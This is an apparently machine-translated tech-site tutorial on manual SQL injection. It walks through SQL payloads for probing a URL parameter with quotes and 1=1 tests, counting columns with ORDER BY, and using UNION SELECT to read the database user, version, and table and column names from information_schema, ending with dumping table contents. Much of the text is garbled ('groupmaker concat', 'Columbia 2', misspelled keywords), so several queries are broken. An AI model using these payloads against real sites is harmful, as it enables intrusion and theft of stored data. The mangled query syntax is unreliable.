Shulou(Shulou.com)05/31 Report--

This article mainly introduces the relevant knowledge of "what is the method of manual injection of sql". The editor shows you the operation process through an actual case. The method of operation is simple, fast and practical. I hope this article "what is the method of manual injection of sql" can help you solve the problem.

Judge the injection point

1. Single quotation mark method: put a single quotation mark after the URL directly. If the page does not display properly and the browser returns some abnormal information, it indicates that there may be a sql injection vulnerability in the link.

2.1 "1" and "1" 2: add and 1 to the get parameters at the back of the URL to show normal, replace 1 "1 with 1" 2, and show an exception, indicating that there is sql injection in the web page.

Determine the type of injection

1. Digital injection: the value of the injected variable does not need to be enclosed in quotation marks, such as

Select * from user where id=$id

two。 Character injection: injection variables are enclosed in quotation marks, such as `

Select * from user where username='$username'; `

Pay attention to closing quotation marks when injecting.

3. Search injection:

Select * from user where username like'% $pass%'

Construct the sql statement as

Select * from user where username like'% $pass%' union select statement'%%'

That is, the transferred variable is closed by the pass%' union select statement'%.

Determine the submission mode of the injection point

Determine whether the injection point is submitted by get,post or cookie by grabbing the package and so on.

Use order by query fields

You can use the order by statement to find out how many fields there are in the database, and you can determine the number of fields in the database by constantly trying. For example, when you enter oeder by 9, the page will display normally when you enter order by 8, that is, there are 8 fields in the database.

For example, the query statement is select * from user where id='$id'

You can construct the following input: (id =') 'order by 3' +-+

That is, the query statement is: select * from user where id='' order by 3'- -'

Use federated queries to query current database, user, and version information

Use the union select statement to query the current user user (), database database (), database version version (), server operating system @ @ version_compile_os, etc.

The version version is very important. If the version is above 5.0, you can use the information_schema library to easily query the information you want.

Construction statement:

Select * from user where id='' union select user (), database (), version () +-- +; query the tables, columns and values in the current database

All the table names and listing information in the database are stored in the information_schema library that comes with the mysql database above version 5.0.

Next, we should according to the results of the current database queried in step 5 (for example, the database is database_1), the information of all the table names tables under the name.

Information_schema.tables: a table that records all the table name information in the database.

The query statement constructed is as follows:

Select * from user where id='' union select 1 (table_name) groupmaker concat, 3 from information_schema.tables where table_schema=database_1;--

The result of the query is: the table name information in the current database of the query in step 5.

Information_schema.columns: records the column name information in all tables in the database

Below, you should query his column name information based on the table name information obtained from the above query (for example, the table is table_1). The construction statement is as follows:

Select * from user where id='' union selcet 1 (column_name) groupmaker concat, 3 from information_schema.columns where table_name=table_1;--

After querying the column name, you can directly use the federated query to find out the information stored in the table (such as the column name found is column_1,column_2) to construct the statement.

Selcet * from user where id='' union select 1 from tables;-- Columbia 2 from tables;--

You can query the stored data of the specified table in the specified database.

This is the end of the content about "what is the method of manual injection of sql". Thank you for reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.